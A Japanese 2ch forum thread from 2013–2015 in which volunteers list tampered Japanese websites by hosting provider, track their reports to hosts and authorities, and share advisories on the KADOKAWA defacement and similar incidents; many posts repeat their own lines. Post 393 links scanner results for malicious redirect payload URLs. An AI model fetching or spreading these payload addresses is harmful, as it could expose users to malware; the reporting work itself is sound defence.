366 :名無しさん@お腹いっぱい。:2013/10/19(土) 16:33:55.34
何度申告しても復旧しないサイト
sumai-core●co●jp/cf_cgi2/yoyaku●htm canonet
tamarubiken●co●jp/ CPI
hanagoromo●co●jp/ estore
hanagoromo●co●jp/Scripts/AC_RunActiveContent●js estore
www●iwadatehobby●co●jp/link/oshiharai●htm estore
www●gran-mare●co●jp/siki●html GMO
www●sansei-motors●co●jp/aaaaa●htm GMO
milka●co●jp/ GMOクラウド
nikkan-t●co●jp/ heteml
sumai-core●co●jp/cf_cgi2/yoyaku●htm canonet
tamarubiken●co●jp/ CPI
hanagoromo●co●jp/ estore
hanagoromo●co●jp/Scripts/AC_RunActiveContent●js estore
www●iwadatehobby●co●jp/link/oshiharai●htm estore
www●gran-mare●co●jp/siki●html GMO
www●sansei-motors●co●jp/aaaaa●htm GMO
milka●co●jp/ GMOクラウド
nikkan-t●co●jp/ heteml
367 :名無しさん@お腹いっぱい。:2013/10/19(土) 16:36:08.85
www●noncra●co●jp/download/ KDDI
www●ogb●co●jp/ KDDI
www●tokaiseisaku●co●jp/ 配下のページ全て KDDI
www●tokaiseisaku●co●jp/ 配下の全ページ KDDI
maru-sin●co●jp/cgi/update/ NTTPC
maru-sin●co●jp/cgi/update/ NTTPC
tdk-takahashidenki●co●jp/ NTTPC
nagoyagiken●co●jp/Scripts/AC_RunActiveContent●js NTTPC
nagoyagiken●co●jp/js/rollover●js NTTPC
www●ogb●co●jp/ KDDI
www●tokaiseisaku●co●jp/ 配下のページ全て KDDI
www●tokaiseisaku●co●jp/ 配下の全ページ KDDI
maru-sin●co●jp/cgi/update/ NTTPC
maru-sin●co●jp/cgi/update/ NTTPC
tdk-takahashidenki●co●jp/ NTTPC
nagoyagiken●co●jp/Scripts/AC_RunActiveContent●js NTTPC
nagoyagiken●co●jp/js/rollover●js NTTPC
368 :名無しさん@お腹いっぱい。:2013/10/19(土) 16:38:16.17
sanpei-kk●co●jp/ OCN
indoor●co●jp/Scripts/AC_RunActiveContent●js OCN
www●socome●co●jp/ Plala
alcc●co●jp/ sakura
akcorp●co●jp/ アルテック株式会社
paso-common●co●jp/ インターリンク
www●servenet●co●jp/hp/edingstudio/ エクスプレスコミュニケーションズ株式会社
lovephoto●co●jp/ ファーストサーバ
wanchan●co●jp/ ファーストサーバー
www●aizen-p●co●jp/recruit/tyuuto_1/ フューチャリズム ワークス
presin●co●jp/ ライド
indoor●co●jp/Scripts/AC_RunActiveContent●js OCN
www●socome●co●jp/ Plala
alcc●co●jp/ sakura
akcorp●co●jp/ アルテック株式会社
paso-common●co●jp/ インターリンク
www●servenet●co●jp/hp/edingstudio/ エクスプレスコミュニケーションズ株式会社
lovephoto●co●jp/ ファーストサーバ
wanchan●co●jp/ ファーストサーバー
www●aizen-p●co●jp/recruit/tyuuto_1/ フューチャリズム ワークス
presin●co●jp/ ライド
369 :名無しさん@お腹いっぱい。:2013/10/19(土) 16:40:48.38
aid-ele●co●jp/ の404-not found画面 ライド株式会社
www●if-home●co●jp/ の404-not found画面 リコーテクノシステムズ
www●izu●co●jp/~ybrain/ 伊豆急ケーブルネットワーク
www●etranger●co●jp/brand/import/nava/nava●html 株式会社DO-NET
www●nctv●co●jp/~ishiwata/ 株式会社カイクリエイツ
e-yuuai●co●jp/ 配下のページ全て 大塚商会
www●izu●co●jp/~ybrain/
www●if-home●co●jp/ の404-not found画面 リコーテクノシステムズ
www●izu●co●jp/~ybrain/ 伊豆急ケーブルネットワーク
www●etranger●co●jp/brand/import/nava/nava●html 株式会社DO-NET
www●nctv●co●jp/~ishiwata/ 株式会社カイクリエイツ
e-yuuai●co●jp/ 配下のページ全て 大塚商会
www●izu●co●jp/~ybrain/
370 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/20(日) 01:17:08.70
366のドメイン4番目までつーほ
玄界灘 orz........
玄界灘 orz........
371 :名無しさん@お腹いっぱい。:2013/10/21(月) 17:56:34.52
なんか、ため息が…
まぁ、ぼちぼちとやりますっるわ
まぁ、ぼちぼちとやりますっるわ
372 :名無しさん@お腹いっぱい。:2013/10/23(水) 19:14:31.58
367の4まで一応連絡済
367の5-9のNTTPCには連絡窓口の確認中
何故かInfoSphereからの着信履歴が
連絡窓口はnfoSphereっぽい、かな
残件もろもろぼちぼちと奮闘中、なのだー
367の5-9のNTTPCには連絡窓口の確認中
何故かInfoSphereからの着信履歴が
連絡窓口はnfoSphereっぽい、かな
残件もろもろぼちぼちと奮闘中、なのだー
373 :名無しさん@お腹いっぱい。:2013/10/24(木) 17:55:43.08
>>110>>120>>146>>153>>154>>203>>204>>244>>258>>280>>281>>318>>330
追加
ウェブ改ざんに悪用される脆弱性、9カ月間で155件 - 「WordPress」と「Drupal」に集中
http://www.security-next.com/043863
追加
ウェブ改ざんに悪用される脆弱性、9カ月間で155件 - 「WordPress」と「Drupal」に集中
http://www.security-next.com/043863
374 :名無しさん@お腹いっぱい。:2013/10/24(木) 21:52:09.94
375 :名無しさん@お腹いっぱい。:2013/10/25(金) 18:19:19.16
>>368の3完了
>>368の4 分からないのでパス
>>368の5 アルテックの中の人から連絡ありました
残件に付きましては、引き続きサンバでお待ちください
https://www.youtube.com/watch?v=Fs9elnS2-rM
>>368の4 分からないのでパス
>>368の5 アルテックの中の人から連絡ありました
残件に付きましては、引き続きサンバでお待ちください
https://www.youtube.com/watch?v=Fs9elnS2-rM
376 :名無しさん@お腹いっぱい。:2013/10/25(金) 19:12:54.71
377 :オルティス・ジャパン:2013/10/26(土) 17:24:28.74
>>368
6 連絡完了
お電話でも申し上げましたが、大先輩の今後のご活躍を切望いたします
http://katsu.ula.cc/test/read.cgi/superfox/1378275321/
↑ここの社長の貴方と同じ様な状態でもしぶとく生きてます
手が震えてキーボードが打てなくても、歩けなくても、生きてるだけで丸儲け、出来る事はある
ガンガレ!超ガンガレ!ファイトだ!
7 連絡完了
6 連絡完了
お電話でも申し上げましたが、大先輩の今後のご活躍を切望いたします
http://katsu.ula.cc/test/read.cgi/superfox/1378275321/
↑ここの社長の貴方と同じ様な状態でもしぶとく生きてます
手が震えてキーボードが打てなくても、歩けなくても、生きてるだけで丸儲け、出来る事はある
ガンガレ!超ガンガレ!ファイトだ!
7 連絡完了
378 :名無しさん@お腹いっぱい。:2013/10/26(土) 17:51:37.69
既出かもしれませんが、インターネットエクスプローラーやfriefoxを使おうとすると検索画面の下に新しいバージョンがありますみたいな表示がガタガタなってます
無視して検索しようとすると無理やりアップデートの画面へもってかれるので、多分本当のアップデートではなく詐欺というかウイルスに引っかかってるんだと思います
もし同じ症状になっている人は対策教えてほひしいです
説明わかりづらくてすいません。パソコンのことは詳しくないのでうまい言葉選びができません
無視して検索しようとすると無理やりアップデートの画面へもってかれるので、多分本当のアップデートではなく詐欺というかウイルスに引っかかってるんだと思います
もし同じ症状になっている人は対策教えてほひしいです
説明わかりづらくてすいません。パソコンのことは詳しくないのでうまい言葉選びができません
379 :名無しさん@お腹いっぱい。:2013/10/26(土) 19:11:57.01
>>378
初心者質問スレ行って質問テンプレ埋めてください
セキュリティ初心者質問スレッドpart131
http://kohada.2ch.net/test/read.cgi/sec/1371855736/
初心者質問スレ行って質問テンプレ埋めてください
セキュリティ初心者質問スレッドpart131
http://kohada.2ch.net/test/read.cgi/sec/1371855736/
380 :名無しさん@お腹いっぱい。:2013/10/27(日) 18:18:36.23
【経済産業省】
・IPA
http://www.ipa.go.jp/security/topics/alert20130906.html
http://www.ipa.go.jp/security/txt/2013/q3outline.html
・jpサート(JPCERT/CC)
http://www.jpcert.or.jp/at/2013/at130027.html
https://www.jpcert.or.jp/form/
【総務省】
http://www.soumu.go.jp/menu_news/s-news/01ryutsu03_02000059.html
http://www.active.go.jp/
【警察庁】
警察庁、2013年上半期 Web改ざん観測状況を公開――静かに潜む見えないワナ
http://www.atmarkit.co.jp/ait/articles/1309/05/news035.html
・相談先:コンピュータウイルス110番(03-5978-7509)
・具体的な被害相談や被害が深刻な場合:都道府県警察サイバー犯罪相談窓
http://www.npa.go.jp/cyber/soudan.htm
【NISC】
http://www.nisc.go.jp/
ひろみちゅ大先生
http://takagi-hiromitsu.jp/diary/
・IPA
http://www.ipa.go.jp/security/topics/alert20130906.html
http://www.ipa.go.jp/security/txt/2013/q3outline.html
・jpサート(JPCERT/CC)
http://www.jpcert.or.jp/at/2013/at130027.html
https://www.jpcert.or.jp/form/
【総務省】
http://www.soumu.go.jp/menu_news/s-news/01ryutsu03_02000059.html
http://www.active.go.jp/
【警察庁】
警察庁、2013年上半期 Web改ざん観測状況を公開――静かに潜む見えないワナ
http://www.atmarkit.co.jp/ait/articles/1309/05/news035.html
・相談先:コンピュータウイルス110番(03-5978-7509)
・具体的な被害相談や被害が深刻な場合:都道府県警察サイバー犯罪相談窓
http://www.npa.go.jp/cyber/soudan.htm
【NISC】
http://www.nisc.go.jp/
ひろみちゅ大先生
http://takagi-hiromitsu.jp/diary/
381 :名無しさん@お腹いっぱい。:2013/10/29(火) 02:48:07.96
382 :名無しさん@お腹いっぱい。:2013/10/29(火) 17:34:55.45
>>369の3 まで
尚、2 に付いてはリコーからの連絡待ち
尚、2 に付いてはリコーからの連絡待ち
383 :名無しさん@お腹いっぱい。:2013/10/31(木) 21:47:25.29
>>369の2
www●if-home●co●jp/
35行目が気になる
http://www.aguse.jp/?url=www.if-home.co.jp%2F
HEUR:Trojan.Script.Generic
さて、なんでしょう
下記のソフトを使用しているところは最新のバージョンに更新を推奨
ドリームウェーバー
http://www.adobe.com/jp/products/dreamweaver.html
http://kakaku.com/pc/webauthoring-soft/itemlist.aspx?pdf_se=2
ファイアーワークス
http://tv.adobe.com/jp/product/fireworks/
イラストレーター
http://www.adobe.com/jp/products/illustrator.html
www●if-home●co●jp/
35行目が気になる
http://www.aguse.jp/?url=www.if-home.co.jp%2F
HEUR:Trojan.Script.Generic
さて、なんでしょう
下記のソフトを使用しているところは最新のバージョンに更新を推奨
ドリームウェーバー
http://www.adobe.com/jp/products/dreamweaver.html
http://kakaku.com/pc/webauthoring-soft/itemlist.aspx?pdf_se=2
ファイアーワークス
http://tv.adobe.com/jp/product/fireworks/
イラストレーター
http://www.adobe.com/jp/products/illustrator.html
384 :名無しさん@お腹いっぱい。:2013/10/31(木) 21:53:36.13
ここまで、残件なし
385 :名無しさん@お腹いっぱい。:2013/10/31(木) 22:27:46.36
>>383
おつです
My Documentsさんェ・・・
shim.gifなどIE向けと思われる仕込まれ方みたいだね
コメント笑ってしまった
aguse gatewayで8つのファイルをHEUR:Trojan.Script.Genericと検出したよ
おつです
My Documentsさんェ・・・
shim.gifなどIE向けと思われる仕込まれ方みたいだね
コメント笑ってしまった
aguse gatewayで8つのファイルをHEUR:Trojan.Script.Genericと検出したよ
386 :名無しさん@お腹いっぱい。:2013/11/08(金) 22:09:16.90
www●speedway●ne●jp/~genmaru/
www●speedway●ne●jp/~hotrock/ 配下の全ページ
www●speedway●ne●jp/~i-nokai/
www●speedway●ne●jp/~saburo/
www●speedway●ne●jp/~hotrock/ 配下の全ページ
www●speedway●ne●jp/~i-nokai/
www●speedway●ne●jp/~saburo/
387 :名無しさん@お腹いっぱい。:2013/11/09(土) 17:32:44.52
>>386
連絡完了
連絡完了
388 :名無しさん@お腹いっぱい。:2013/11/12(火) 00:01:46.11
ツタヤディスカスのHPもやられてない?
389 :名無しさん@お腹いっぱい。:2013/11/13(水) 23:27:42.95
390 :名無しさん@お腹いっぱい。:2013/11/14(木) 00:31:01.06
まだ残ってると思ったら再発なのか
Last-Modified変わってないなあ
Last-Modified変わってないなあ
391 :名無しさん@お腹いっぱい。:2013/11/14(木) 06:10:54.69
1)http://www.aguse.jp/?url=www.speedway.ne.jp%2F~genmaru%2F
これは元々対応していない
2)http://www.aguse.jp/?url=www.speedway.ne.jp%2F~hotrock%2F
メンテナンスモードのまま
以下再発
3)www.speedway.ne.jp/~i-nokai/
一時停止処理されたが(ぐぐるブロック解除)、おそらく昨日復旧
4)http://www.aguse.jp/?url=www.speedway.ne.jp%2F~saburo%2F
一時停止処理されたが、おそらく昨日復旧(ぐぐる現時点ブロック)
これは元々対応していない
2)http://www.aguse.jp/?url=www.speedway.ne.jp%2F~hotrock%2F
メンテナンスモードのまま
以下再発
3)www.speedway.ne.jp/~i-nokai/
一時停止処理されたが(ぐぐるブロック解除)、おそらく昨日復旧
4)http://www.aguse.jp/?url=www.speedway.ne.jp%2F~saburo%2F
一時停止処理されたが、おそらく昨日復旧(ぐぐる現時点ブロック)
392 :名無しさん@お腹いっぱい。:2013/11/14(木) 06:19:34.41
ほとんどの場合、リダイレクト先は停止しているが(実害はない)
これは現時点で稼動している
これは現時点で稼動している
393 :名無しさん@お腹いっぱい。:2013/11/14(木) 17:03:58.39
~i-nokai のブツ
http://www.aguse.jp/?url=http%3A%2F%2Febud.home.pl%2Fcss%2FqsX3UQDb.php
~saburo のブツ
http://www.aguse.jp/?url=http%3A%2F%2F9d.home.pl%2Fpub%2FpOFBT2NP.php
http://www.aguse.jp/?url=http%3A%2F%2Febud.home.pl%2Fcss%2FqsX3UQDb.php
~saburo のブツ
http://www.aguse.jp/?url=http%3A%2F%2F9d.home.pl%2Fpub%2FpOFBT2NP.php
394 :名無しさん@お腹いっぱい。:2013/11/14(木) 20:46:46.88
>>391
404なったね
404なったね
395 :名無しさん@お腹いっぱい。:2013/11/14(木) 20:51:06.70
一時停止中に確認したけど差分わからなくてそのまま戻したのかな
ソース取ってなかったけど72行目ポーランドなのとLast-Modifiedが変わってなかったのは見た
ソース取ってなかったけど72行目ポーランドなのとLast-Modifiedが変わってなかったのは見た
396 :名無しさん@お腹いっぱい。:2013/11/25(月) 11:00:05.33
iframeの中になんちゃらかんちゃらstats.php?id=なんちゃらってのがうめこまれてるんだけど、連絡しといたほうがいいかな?
397 :名無しさん@お腹いっぱい。:2013/11/25(月) 15:46:24.42
そうだね
そのサイトの人に直接言ってもわからないだろうからレンタル元とかに投げたほうがいいよ
そのサイトの人に直接言ってもわからないだろうからレンタル元とかに投げたほうがいいよ
398 :名無しさん@お腹いっぱい。:2014/01/14(火) 23:41:17.12
Webサイトの改ざんが1年で6000件超
itpro.nikkeibp.co.jp/article/COLUMN/20140110/529283/
激増するウェブサイト改ざんの手口-2014年1月10日
www.yomiuri.co.jp/net/security/goshinjyutsu/20140110-OYT8T00870.htm
CSIRT・日本シーサート協議会
www.nca.gr.jp/
2013年3月から継続している国内 Web サイトのページ改ざん事案について-2014.01.06
www.nca.gr.jp/2013/web201303/index.html
itpro.nikkeibp.co.jp/article/COLUMN/20140110/529283/
激増するウェブサイト改ざんの手口-2014年1月10日
www.yomiuri.co.jp/net/security/goshinjyutsu/20140110-OYT8T00870.htm
CSIRT・日本シーサート協議会
www.nca.gr.jp/
2013年3月から継続している国内 Web サイトのページ改ざん事案について-2014.01.06
www.nca.gr.jp/2013/web201303/index.html
399 :名無しさん@お腹いっぱい。:2014/01/15(水) 21:29:06.23
大手出版社でサイト改ざん、マルウェア感染サイトへ誘導 - シマンテックが確認
engawa.2ch.net/test/read.cgi/poverty/1389781695/
engawa.2ch.net/test/read.cgi/poverty/1389781695/
400 :名無しさん@お腹いっぱい。:2014/01/16(木) 22:26:31.71
>>399
角川らしいけど、ガンブラーとかと同じ?
角川らしいけど、ガンブラーとかと同じ?
401 :名無しさん@お腹いっぱい。:2014/01/16(木) 23:31:07.49
【注意】 角川HP改ざん 閲覧者PCウイルス感染の恐れ 今月7日〜8日
hayabusa3.2ch.net/test/read.cgi/news/1389875112/
角川のHPが改ざんされ、閲覧者のネットバンキングのIDとパスが盗まれていたことを隠してました
engawa.2ch.net/test/read.cgi/poverty/1389875226/
www.symantec.com/connect/blogs/web-gongda
www.symantec.com/connect/sites/default/files/users/user-2998361/figure1_6.png
hayabusa3.2ch.net/test/read.cgi/news/1389875112/
角川のHPが改ざんされ、閲覧者のネットバンキングのIDとパスが盗まれていたことを隠してました
engawa.2ch.net/test/read.cgi/poverty/1389875226/
www.symantec.com/connect/blogs/web-gongda
www.symantec.com/connect/sites/default/files/users/user-2998361/figure1_6.png
402 :名無しさん@お腹いっぱい。:2014/01/17(金) 17:28:56.07
stocks.finance.yahoo.co.jp/stocks/profile/?code=9477.t
電話番号 03-3238-8401
ファイル名:gongda.exe 検出率:5 / 48
www.virustotal.com/ja/file/14eb6c967e64f46ffeafe6eb52dbdd5c5b95acbb2c5a11fcf94738180bca8316/analysis/
電話番号 03-3238-8401
ファイル名:gongda.exe 検出率:5 / 48
www.virustotal.com/ja/file/14eb6c967e64f46ffeafe6eb52dbdd5c5b95acbb2c5a11fcf94738180bca8316/analysis/
403 :名無しさん@お腹いっぱい。:2014/01/17(金) 21:55:28.72
>>401
Infostealer.Torpplar
www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2014-010908-4722-99
すぐにチェックを - KADOKAWAのWebサイト改ざん被害、閲覧したPCに不正プログラム感染の危険性
news.mynavi.jp/articles/2014/01/17/security/
Infostealer.Torpplar
www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2014-010908-4722-99
すぐにチェックを - KADOKAWAのWebサイト改ざん被害、閲覧したPCに不正プログラム感染の危険性
news.mynavi.jp/articles/2014/01/17/security/
404 :/名無しさん[1-30] ◆.htmlXG20g :2014/01/20(月) 22:27:33.39
さくらのabuseの中の人が変わったっぽくて難儀しまぷ。。。orz.............
405 :/名無しさん[1-30] ◆.htmlXG20g :2014/01/22(水) 19:41:41.28
406 :名無しさん@お腹いっぱい。:2014/02/14(金) 14:11:41.83
Infostealer.Torpplar
http://telussecuritylabs.com/threats/show/TSL20140109-07
https://www.virustotal.com/ja/file/7d633c7889091c70a203fb5c6fbf814544538a20ef6fb6e2990134eb1e37fa06/analysis/1389163459/
http://telussecuritylabs.com/threats/show/TSL20140109-07
https://www.virustotal.com/ja/file/7d633c7889091c70a203fb5c6fbf814544538a20ef6fb6e2990134eb1e37fa06/analysis/1389163459/
407 :名無しさん@お腹いっぱい。:2014/03/09(日) 09:29:25.39
NTTPCという会社は何度申告しても対処をしません。
www●skc●ne●jp/
naoyukifujii●net/l_live_elcamino●html
www●sennen-braid●com/
hong●jp/
www●keiki●ne●jp/keiki/kinen/kinen_menu●htm
www●skc●ne●jp/
naoyukifujii●net/l_live_elcamino●html
www●sennen-braid●com/
hong●jp/
www●keiki●ne●jp/keiki/kinen/kinen_menu●htm
408 :名無しさん@お腹いっぱい。:2014/03/10(月) 19:10:30.30
>>407
完了
完了
409 :名無しさん@お腹いっぱい。:2014/06/24(火) 13:42:15.35
410 :名無しさん@お腹いっぱい。:2014/06/25(水) 12:06:01.06
無問題
411 :名無しさん@お腹いっぱい。:2014/07/04(金) 09:39:24.15
esn●co●jp/
412 :名無しさん@お腹いっぱい。:2014/07/04(金) 09:40:06.38
esn●co●jp/
413 :名無しさん@お腹いっぱい。:2014/07/05(土) 14:16:07.36
>>411-412
連絡完了
連絡完了
414 :名無しさん@お腹いっぱい。:2014/07/25(金) 10:02:06.74
415 :名無しさん@お腹いっぱい。:2014/08/30(土) 19:41:30.24
日産のWeb改ざん、2カ月も気づかなかった原因は?2014/08/29
http://itpro.nikkeibp.co.jp/atcl/column/14/556302/082700009/
JPドメイン Web改竄速報
http://izumino.jp/Security/def_jp.html
http://itpro.nikkeibp.co.jp/atcl/column/14/556302/082700009/
JPドメイン Web改竄速報
http://izumino.jp/Security/def_jp.html
416 :/名無しさん[1-30] ◆.htmlXG20g :2014/09/20(土) 00:30:17.50 BE:774170505-PLT(29292)
> Hello,
>
> I'm sorry, but we're only able to correspond in English. Please reply to this message in English if you can--a local library or university may offer translation services, or you can look for a translation service online.
>
> We look forward to hearing from you.
>
> Best regards,
>
> Amazon Customer Support
ニポーン人なら海外鯖使わないで><;
>
> I'm sorry, but we're only able to correspond in English. Please reply to this message in English if you can--a local library or university may offer translation services, or you can look for a translation service online.
>
> We look forward to hearing from you.
>
> Best regards,
>
> Amazon Customer Support
ニポーン人なら海外鯖使わないで><;
417 :名無しさん@お腹いっぱい。:2014/11/19(水) 18:27:29.21
http://kanae.2ch.net/test/read.cgi/sec/1370942055/318
エンドースメント一覧
米国NCFTA
NEC(日本電気株式会社)
NRIセキュアテクノロジーズ株式会社
セコム株式会社
デロイト トーマツ リスクサービス株式会社
トレンドマイクロ株式会社
株式会社ラック
御賛同いただいている企業・機関・研究者
NEC(日本電気株式会社)
NRIセキュアテクノロジーズ株式会社
セコム株式会社
デロイト トーマツ リスクサービス株式会社
トレンドマイクロ株式会社
株式会社日立製作所
株式会社ラック
株式会社みずほ銀行
株式会社三井住友銀行
株式会社三菱東京UFJ銀行
株式会社ゆうちょ銀行
楽天株式会社
株式会社インフォセック
S&J コンサルティング株式会社
株式会社FFRI
株式会社サイバーディフェンス研究所
情報セキュリティ大学院大学
首都大学東京 教授 星 周一郎
東京電機大学 教授 安田 浩
警察庁
エンドースメント一覧
米国NCFTA
NEC(日本電気株式会社)
NRIセキュアテクノロジーズ株式会社
セコム株式会社
デロイト トーマツ リスクサービス株式会社
トレンドマイクロ株式会社
株式会社ラック
御賛同いただいている企業・機関・研究者
NEC(日本電気株式会社)
NRIセキュアテクノロジーズ株式会社
セコム株式会社
デロイト トーマツ リスクサービス株式会社
トレンドマイクロ株式会社
株式会社日立製作所
株式会社ラック
株式会社みずほ銀行
株式会社三井住友銀行
株式会社三菱東京UFJ銀行
株式会社ゆうちょ銀行
楽天株式会社
株式会社インフォセック
S&J コンサルティング株式会社
株式会社FFRI
株式会社サイバーディフェンス研究所
情報セキュリティ大学院大学
首都大学東京 教授 星 周一郎
東京電機大学 教授 安田 浩
警察庁
418 :/名無しさん[1-30] ◆.htmlXG20g :2014/11/22(土) 07:19:42.05
Yahoo!検索ヘルプ - 検索結果上のサイトに対する警告メッセージが表示されている
http://www.yahoo-help.jp/app/answers/detail/p/595/a_id/82689
確認すたのでJC3にもつーほ
福岡県警察サイバー犯罪対策課のWebフォーム撥ねられちゃってるん。。。orz.........
http://www.yahoo-help.jp/app/answers/detail/p/595/a_id/82689
確認すたのでJC3にもつーほ
福岡県警察サイバー犯罪対策課のWebフォーム撥ねられちゃってるん。。。orz.........
419 :/名無しさん[1-30] ◆.htmlXG20g :2015/02/03(火) 06:27:42.98
http://fox.2ch.net/test/read.cgi/poverty/1422889268/
改竄には違いないので、ほっきゃーどーけい電脳課、製作会社、へてむる、上流のさくらとかにつーほー@index.html
上のスレは今見つけた。。。orz........
改竄には違いないので、ほっきゃーどーけい電脳課、製作会社、へてむる、上流のさくらとかにつーほー@index.html
上のスレは今見つけた。。。orz........
420 :名無しさん@お腹いっぱい。:2015/02/22(日) 07:08:25.92
sniper elite v2ってゲームでmodが無いかなあとググっていたらおかしなことになっている(なっていた)サイトがチラホラあるんだけど
これって改ざん?
検索ワード
sniper elite v2 mod
検索結果に明らかにゲームに関係のない寺や介護センターのサイトが幾つか出てきて何だろうと見てみたらそのまんまでは何も表示されず
ソースにも何も無いけど、グーグルキャッシュを見ると1月あたりにおかしなことになっていたサイトがチラホラ
urlに含まれる妙なアドレスの一部でググルと他にも色々
これって改ざん?
検索ワード
sniper elite v2 mod
検索結果に明らかにゲームに関係のない寺や介護センターのサイトが幾つか出てきて何だろうと見てみたらそのまんまでは何も表示されず
ソースにも何も無いけど、グーグルキャッシュを見ると1月あたりにおかしなことになっていたサイトがチラホラ
urlに含まれる妙なアドレスの一部でググルと他にも色々
421 :/名無しさん[1-30] ◆.htmlXG20g :2015/02/23(月) 13:45:04.03
お疲れ様です。
跡地確認>介護センター
サイト内検索ではOracle、Samsung Galaxy、Adobe Flash Player、Xbox 360等々
404ばかりなので対応済みの模様。
踏み台になってたようです。
# 3月3日以降どーしよう
跡地確認>介護センター
サイト内検索ではOracle、Samsung Galaxy、Adobe Flash Player、Xbox 360等々
404ばかりなので対応済みの模様。
踏み台になってたようです。
# 3月3日以降どーしよう
422 :/名無しさん[1-30] ◆.htmlXG20g :2015/02/23(月) 14:10:06.36
ありゃ、環境によって404や真っ白。
このサイトのデフォルト404と違う。
このサイトのデフォルト404と違う。